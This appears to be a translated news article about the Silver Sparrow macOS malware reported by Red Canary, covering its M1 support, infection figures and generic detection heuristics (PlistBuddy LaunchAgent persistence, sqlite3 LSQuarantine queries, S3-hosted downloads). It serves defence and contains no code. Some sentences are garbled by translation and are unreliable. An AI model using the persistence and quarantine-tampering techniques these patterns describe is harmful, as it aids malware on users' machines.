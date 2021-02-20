



The second known malware, compiled to run natively on the M1 Mac, was discovered by security firm Red Canary.

This malicious package, named “Silver Sparrow,” is said to use the macOS installer’s JavaScript API to execute suspicious commands. However, after observing the malware for more than a week, neither Red Canary nor its research partners observed the final payload, so the exact threat posed by the malware remains a mystery.

Nonetheless, Red Canary said malware could be a “quite serious threat.”

Silver Sparrow has not yet been confirmed to deliver additional malicious payloads, but its positive M1 chip compatibility, global reach, relatively high infection rate, and operational maturity have been demonstrated by Silver Sparrow. It is a fairly serious threat, suggesting that it is in its own position to deliver potentially influential payloads. Soon.

According to data provided by Malwarebytes, “Silver Sparrow” has been installed on 29,139 macOS systems in 153 countries as of February 17, including “mass detections in the United States, United Kingdom, Canada, France and Germany.” I was infected. Red Canary has not identified how many of these systems are M1Macs.

Given that the “Silver Sparrow” binaries “do not seem to do much” yet, Red Canary called them “bystander binaries”. When run on an Intel-based Mac, the malicious package simply displays a blank window that says “Hello, World!”. While the message, Apple Silicon Binary leads to a red window saying “Done!”.

Red Canary shares methods for detecting various macOS threats, but the steps are not specific to “Silver Sparrow” detection.

Look for a process that looks like a PlistBuddy running in combination with –LaunchAgents and a command line containing RunAtLoad and true. This analysis helps find multiple macOS malware families that have established LaunchAgent persistence. -Look for a process that looks like sqlite3 running in combination with a command line containing LSQuarantine. This analysis helps you find multiple macOS malware families that manipulate or search the metadata of downloaded files. Look for processes that appear to be running in combination with the command line containing -s3.amazonaws.com. This analysis helps you find multiple macOS malware families that are using S3 buckets for distribution.

The first piece of malware that can run natively on the M1 Mac was discovered just a few days ago. Technical details about this second malware can be found in the Red Canary blog post. Ars Technica also has a good explanation.

